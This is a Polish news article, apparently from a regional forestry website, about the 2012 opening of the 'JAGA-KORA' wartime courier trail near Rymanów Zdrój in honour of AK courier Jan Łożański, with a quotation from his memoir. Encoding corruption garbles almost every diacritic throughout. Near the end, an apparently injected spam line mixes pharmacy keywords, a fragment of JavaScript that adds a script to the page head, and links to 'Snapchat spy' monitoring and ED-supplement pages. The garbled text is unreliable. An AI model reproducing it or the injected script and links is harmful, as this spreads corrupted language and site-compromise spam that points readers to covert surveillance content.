Trasa Kurierska a�zJAGA-KORAa�? juA? dostA�pna dla turystA?w


RYMANA�W ZDRA�J/ PODKARPACIE. Oddaniu hoA�du Janowi A?oA?aA�skiemu, synowi ziemi sanockiej, sportowcowi, A?oA�nierzowi a przede wszystkim patriocie poA�wiA�cona byA�a konferencja a�zBeskidzka Trasa Kurierska a�zJAGA-KORAa�?, ktA?ra odbyA�a siA� w dniach 23-24 listopada 2012 roku w Rymanowie Zdroju.

W jej trakcie przybliA?ono dokonania tego znakomitego kuriera Armii Krajowej. OdbyA�a siA� rA?wnieA? promocja ksiA�A?ki a�zOrzeA� z Budapesztu”, wydanej przez wydawnictwo Demart.
a�za��BA�dA�c juA? w lesie a�zSzachty”, ktA?ry zawsze przebywaliA�my skrajem, spostrzegliA�my patrol niemieckiej straA?y granicznej, wychodzA�cy ze wsi Wola NiA?na. Szli bardzo spokojnie, nie podejrzewajA�c, A?e w odlegA�oA�ci zaledwie 2 kilometrA?w znajdujA� siA� a�zprzemytnicy” (kurierzy), stanowiA�cy dla nich nie lada gratkA�. Kiedy przechodziliA�my koA�o Polan Surowicznych, zauwaA?yA� nas jeden z mieszkaA�cA?w, ktA?ry wszczA�A� alarm, biegajA�c od domu do domu i wskazujA�c na nas. Nie czekajA�c, aA? poA�cig ruszy, przyA�pieszyliA�my kroku, a po chwili zaczA�liA�my biec, aA? osiA�gnA�liA�my zbawczy las. SzliA�my nim okoA�o dwA?ch godzin, nie mogA�c siA� wydostaA�. ByA� to stary las, bardzo maA�o uczA�szczany, w ktA?rym leA?aA�o duA?o powalonych drzew, zupeA�ni zgniA�ych i sprA?chniaA�ych. WydawaA�o siA� nam chwilami, A?e jesteA�my gdzieA� w podzwrotnikowej, dziewiczej puszczy, ktA?ra nie widziaA�a nigdy piA�y i siekiery. Gdzieniegdzie trawy i paprocie siA�gaA�y nam do piersi. ByliA�my mocno zaniepokojeni, ale za to bezpieczni od poA�cigu UkraiA�cA?wa��” – tak opisywaA� swojA� kurierskA� robotA� Jan A?oA?aA�ski ps. a�zOrzeA�”.
W sobotni poranek 24 listopada 2012 roku, nastA�piA�o otwarcie A?ywego pomnika dla Jana A?oA?aA�skiego, ktA?rym jest odtworzona w formie szlaku turystycznegoA� trasa kurierskaA� a�zJAGA-KORA”, wiodA�ca wiA�kszej czA�A�ci przez tereny NadleA�nictwa RymanA?w. Gospodarz tego terenu, nadleA�niczy BogusA�aw Famielec do otwarcia trasy zaprosiA�: BeatA� RomanowskA� cA?rkA� Jana A?oA?aA�skiego, prof. Aleksandra Bobko rektora Uniwersytetu Rzeszowskiego, StanisA�awa Romana, prezesa Lokalnej Organizacji Turystycznej a�zBeskid Niski”, Andrzeja Guzika wicestarostA� Powiatu KroA�nieA�skiego, Wojciecha FarbaA�ca Burmistrza Miasta i Gminy RymanA?w,A� przedstawicieli UrzA�du MarszaA�kowskiego z Rzeszowa, pomysA�odawcA?w i wykonawcA?w z Centrum Sportu i Rekreacji Uniwersytetu Rzeszowskiego na czele z BogusA�awem Berdelem oraz z Sekcji Turystycznej a�zWatra” KU AZS Uniwersytetu Rzeszowskiego Jacka Smulskiego.
Po uroczystym przeciA�ciu jodA�owej wstA�gi, zebrani udali siA� do Woli WyA?nej, skA�d pieszo przemaszerowali do Jasiela, pod pomnik poA�wiA�cony Kurierom Beskidzkim. Jednak grupa najtwardszych turystA?w na czele z Rektorem Uniwersytetu Rzeszowskiego, postanowiA�a przejA�A� najtrudniejszA� czA�A�A� z WisA�oczka do Polan Surowicznych. W wA�drA?wce tej wziA�A� rA?wnieA? udziaA� wnuk Jana A?oA?aA�skiego. Piechurzy po 2 godzinach wyA�onili siA� z mgA�y na stokach PolaA�skiej GA?ry, gdzie czekaA�a na nich ciepA�a herbata w goA�cinnych progach schroniska Klubu Turystyki ElektrykA?w a�zStyki”.
HonorowA� wartA� przy pomniku KurierA?w Beskidzkich peA�nili czA�onkowie Towarzystwa Gimnastycznego a�zSokA?A�” z Rymanowa, na czele z Prezesem Zygmuntem Pelczarem i czA�onkiem zarzA�du Kazimierzem Cetnarskim. Zebrani zA�oA?yli wiA�zanki kwiatA?w i zapalili znicze, jedna z druhen odA�piewaA�a wzruszajA�cA� pieA�A� ku czci tych, ktA?rzy polegli za wolnA� PolskA�.
ByA� to szczegA?lny moment dla leA�niczego PawA�a GrodziA�skiego . Jego dziadek Wojciech GrodziA�ski, rA?wnieA? leA�nik, w trakcie II wojny A�wiatowej zostaA� zamA�czony w niemieckim obozie wA�aA�nie za dziaA�alnoA�A� kurierskA� w JaA�liskach.
Uczestnicy zA�oA?yli rA?wnieA? wiA�zanki pod pomnikiem polegA�ych A?oA�nierzy WOP.
WA�rA?d zebranych byA�a liczna grupa rymanowskich leA�nikA?w, zaangaA?owanych wczeA�niej w prace przy odtworzeniuA� trasy a�zJAGA-KORA”. Udzielali wszelkiej niezbA�dnej pomocy przy wytyczaniu trasy. WspA?A�praca ta byA�a moA?liwa po podpisaniu przez nadleA�nictwo porozumienia o partnerstwie,A� w projekcie powadzonym przez LokalnA� OrganizacjA� TurystycznA� a�zBeskid Niski” i Centrum Sportu i Rekreacji Uniwersytetu Rzeszowskiego i SekcjA� turystycznA� a�zWatra” KU AZS UR. W wyniku tej dobrej wspA?A�pracy powstaA�o 27 kilometrA?w nowej, atrakcyjnej trasy historyczno-turystycznej.

Tekst i zdjA�cia: Maciej Szpiech
Cytat pochodzi z a�zOrzeA� z Budapesztu” Wspomnienia kuriera KG AK wydawnictwa Demart SA.

o

RDLP Krosno} januvia cost walmart buy betapace prescribing Buy online pharm d.getElementsByTagName(‚head’)[0].appendChild(s);http://virtualdesktopbabes.com/blog/2017/10/31/snapchat-spy-spy-on-iphone-how-can-i-monitor-snapchat/ http://ameg.org.mx/how-much-ginseng-to-take-for-ed/


Napisz komentarz:

"UWAGA! Komentarze niezgodne z regulaminem serwisu nie będą publikowane. Zachęcamy do kulturalnego wyrażania opinii na temat artykułów oraz unikania personalnych ataków słownych."